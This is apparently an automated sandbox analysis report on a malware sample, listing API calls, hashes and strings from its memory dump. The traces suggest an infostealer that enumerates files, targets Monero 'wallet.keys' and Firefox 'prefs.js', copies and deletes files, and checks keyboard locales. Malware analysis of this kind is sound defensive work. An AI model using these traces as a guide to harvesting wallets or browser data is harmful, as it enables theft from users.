                        • Instruction ID: 126de215eeaa4e77da6b2552ab1b0bdb7f117860f5c63ad2c525df7a5698662a
                        • Opcode Fuzzy Hash: f5c3dbfc2e39d314294f0ddd028cb51a88c93651c79001d4a141faa44332c80a
                        • Instruction Fuzzy Hash: 015183B59102189BC760FB70DC89FEE777CAB58300F408598F60D92190EB749BA4CF96
                        APIs
                        • wsprintfA.USER32 ref: 00273EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 00273EDA
                        • StrCmpCA.SHLWAPI(?,00280FAC), ref: 00273F08
                        • StrCmpCA.SHLWAPI(?,00280FB0), ref: 00273F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0027406C
                        • FindClose.KERNEL32(000000FF), ref: 00274081
                        Strings
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$($(
                        • API String ID: 180737720-2702466942
                        • Opcode ID: 948649bc42316df080de3ee3acb8d9159482520d14c5ed126280f18a6bae501b
                        • Instruction ID: 2ee3bcdac4cdbb7e23a36c09fef926467ee12409968ad06100bc1ba321fb06fc
                        • Opcode Fuzzy Hash: 948649bc42316df080de3ee3acb8d9159482520d14c5ed126280f18a6bae501b
                        • Instruction Fuzzy Hash: D05186B2910218ABCB24FBB0DC85EEE777CBB44300F40859CB25D96080DB759BA9CF95
                        APIs
                        • wsprintfA.USER32 ref: 0026ED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 0026ED55
                        • StrCmpCA.SHLWAPI(?,00281538), ref: 0026EDAB
                        • StrCmpCA.SHLWAPI(?,0028153C), ref: 0026EDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0026F2AE
                        • FindClose.KERNEL32(000000FF), ref: 0026F2C3
                        Strings
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 5de4a086b27ebe23a9f7012d32d626e49e942822115c4cb29299e107982bda08
                        • Instruction ID: 73d4e438e60780bc6313c5aa4e6d13c685ee58a9c558b47abe26a6ca627fe162
                        • Opcode Fuzzy Hash: 5de4a086b27ebe23a9f7012d32d626e49e942822115c4cb29299e107982bda08
                        • Instruction Fuzzy Hash: A6E1D1719211189ADB54FB60DC52EEE733CAF94310F4085A9B51F62092EF306FAACF56
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,002815B8,00280D96), ref: 0026F71E
                        • StrCmpCA.SHLWAPI(?,002815BC), ref: 0026F76F
                        • StrCmpCA.SHLWAPI(?,002815C0), ref: 0026F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0026FAB1
                        • FindClose.KERNEL32(000000FF), ref: 0026FAC3
                        Strings
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: dbf6ff12a3293566f10f7d0b3b9a56b7908e6a6d14194f3f7d9ae848de3397a3
                        • Instruction ID: 9e7f3ac1d66a57722449e282687102efca10d9c74a1e46bc2183eb9d75c293d2
                        • Opcode Fuzzy Hash: dbf6ff12a3293566f10f7d0b3b9a56b7908e6a6d14194f3f7d9ae848de3397a3
                        • Instruction Fuzzy Hash: B1B162719201089BDB64FF74DD96EEE7379AF94310F4085A8A40E97181EF306B69CF92
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0028510C,?,?,?,002851B4,?,?,00000000,?,00000000), ref: 00261923
                        • StrCmpCA.SHLWAPI(?,0028525C), ref: 00261973
                        • StrCmpCA.SHLWAPI(?,00285304), ref: 00261989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00261D40
                        • DeleteFileA.KERNEL32(00000000), ref: 00261DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00261E20
                        • FindClose.KERNEL32(000000FF), ref: 00261E32
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: d6beaf4df9f1c3b083cbbae90dbad6f58e2f839071dd3821986b2413f7c113ae
                        • Instruction ID: 24050df4d4c41f46976c4e514aed91397115df6f61da89ada7b6fb4b8236a72a
                        • Opcode Fuzzy Hash: d6beaf4df9f1c3b083cbbae90dbad6f58e2f839071dd3821986b2413f7c113ae
                        • Instruction Fuzzy Hash: F01206719311189BDB59FB60CC96EEE7378AF94310F408199B51E62091EF306FA9CF92
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00280C2E), ref: 0026DE5E
                        • StrCmpCA.SHLWAPI(?,002814C8), ref: 0026DEAE
                        • StrCmpCA.SHLWAPI(?,002814CC), ref: 0026DEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0026E3E0
                        • FindClose.KERNEL32(000000FF), ref: 0026E3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: cab9b6ed129d67fe0f9f6327015871f0d0be5b469e6b575683869192d0b83940
                        • Instruction ID: 4dac160106d51ebe18d65a9d95b39c35ed278b61713b0c2587e8613fdcb28e80
                        • Opcode Fuzzy Hash: cab9b6ed129d67fe0f9f6327015871f0d0be5b469e6b575683869192d0b83940
                        • Instruction Fuzzy Hash: 13F191759301189ADB15FB60CC96EEE7338BF54310F8081E9A51E62091EF306FAACF56
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,002814B0,00280C2A), ref: 0026DAEB
                        • StrCmpCA.SHLWAPI(?,002814B4), ref: 0026DB33
                        • StrCmpCA.SHLWAPI(?,002814B8), ref: 0026DB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0026DDCC
                        • FindClose.KERNEL32(000000FF), ref: 0026DDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 5850d36621fdb13460501a4a90ab823df82d56ff99bd0e787a66e7d4a943ef3c
                        • Instruction ID: 23a3741ac4289250625a69b3849907724423bbb9d58fb6faa99a35dff13c6e92
                        • Opcode Fuzzy Hash: 5850d36621fdb13460501a4a90ab823df82d56ff99bd0e787a66e7d4a943ef3c
                        • Instruction Fuzzy Hash: B0913372A201089BCB14FF74DC569EE777CABC4310F408668B91A96181EE349B79CF97
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,002805AF), ref: 00277BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00277BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00277C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00277C62
                        • LocalFree.KERNEL32(00000000), ref: 00277D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: 63c7a6a3b0bf36d28ad132afdfd343cc676dcae3cae59e7a0938a5213d7f91ee
                        • Instruction ID: e07dc47ead2fd7d9517c4946cbe08ec8a85f4677cd4175511046207751545580
                        • Opcode Fuzzy Hash: 63c7a6a3b0bf36d28ad132afdfd343cc676dcae3cae59e7a0938a5213d7f91ee
                        • Instruction Fuzzy Hash: 04416E71961118ABDB24DF54DC89FEEB778FF48700F208199E10A62180DB742F95CFA6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ;f{z$CR,~$CT{u$Fq]$[[_w$"?$zx
                        • API String ID: 0-3733408663
                        • Opcode ID: fba56673414499b0153fd3536dfd098ef16fdd4e318973f70a8d43de0143bb0e
                        • Instruction ID: 9a7a0462d9f0ffacb4eb2d0cd134e597ab194445999fd7d6e39828d708fa60f6
                        • Opcode Fuzzy Hash: fba56673414499b0153fd3536dfd098ef16fdd4e318973f70a8d43de0143bb0e
                        • Instruction Fuzzy Hash: 26B209F3A0C200AFE3146E2DEC8567AB7E9EFD4720F1A453DE6C4C3744EA3558058696
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ?Gk$LxV$^mw$dql.$e3wo$kig{$lLk
                        • API String ID: 0-2097328590
                        • Opcode ID: 9bcccd62618babde5730013037370a47a56883c95a9f43c5ae9475b2c2b7c382
                        • Instruction ID: f965bc6b5ae74094bbacbb706540fb6259bcdf4bf58269dfb97cb262324d98b3
                        • Opcode Fuzzy Hash: 9bcccd62618babde5730013037370a47a56883c95a9f43c5ae9475b2c2b7c382
                        • Instruction Fuzzy Hash: 6FB22BF3A0C2049FE3046E2DEC8567ABBD6EFD4720F1A863DEAC497744E93558018796
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00280D73), ref: 0026E4A2
                        • StrCmpCA.SHLWAPI(?,002814F8), ref: 0026E4F2
                        • StrCmpCA.SHLWAPI(?,002814FC), ref: 0026E508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0026EBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: 89c80c29dffe72f4aa3f39e201fcd3949a53d9e4d644f5e5156da9c96e4d29e9
                        • Instruction ID: cd088ee64af9ae22236f586e450dd614ab93b21589b8982ed46b702120222ab2
                        • Opcode Fuzzy Hash: 89c80c29dffe72f4aa3f39e201fcd3949a53d9e4d644f5e5156da9c96e4d29e9
                        • Instruction Fuzzy Hash: 8C1231719201189ADB18FB70DC96EEE7338AF94310F4085A9B51F96091EF346F69CF92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: "qn$;'o~$Q>r$h:w$.c$k~
                        • API String ID: 0-750262017
                        • Opcode ID: c4b06f9bb42daa874629433d333d2123d59f7a547a5ca3007e9e89fac07e2ff4
                        • Instruction ID: 828a985a6050017eaee19439b945895bb18ee58ed6efcbb789c2c159ee519256
                        • Opcode Fuzzy Hash: c4b06f9bb42daa874629433d333d2123d59f7a547a5ca3007e9e89fac07e2ff4
                        • Instruction Fuzzy Hash: 23B2E3F360C2049FE304AE2DEC8567AFBE9EF94620F16893DE6C5C3744EA3558058697
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N&,00000000,00000000), ref: 00269AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,00264EEE,00000000,?), ref: 00269B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N&,00000000,00000000), ref: 00269B2A
                        • LocalFree.KERNEL32(?,?,?,?,00264EEE,00000000,?), ref: 00269B3F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID: N&
                        • API String ID: 4291131564-1489400810
                        • Opcode ID: cf7ebd9a746426515f1a30b4c32422d0b9e3cf43c5d94023d5a9e1acaffe173e
                        • Instruction ID: f3391202e557979ca41832704313ce5d0267bb56df17860d1a8fef95a37c48fc
                        • Opcode Fuzzy Hash: cf7ebd9a746426515f1a30b4c32422d0b9e3cf43c5d94023d5a9e1acaffe173e
                        • Instruction Fuzzy Hash: 2211D4B4240208AFEB00CF64CC95FAA77B9FB8AB14F208058F9159F390C775A951CB54
                        Strings
                        Memory Dump Source
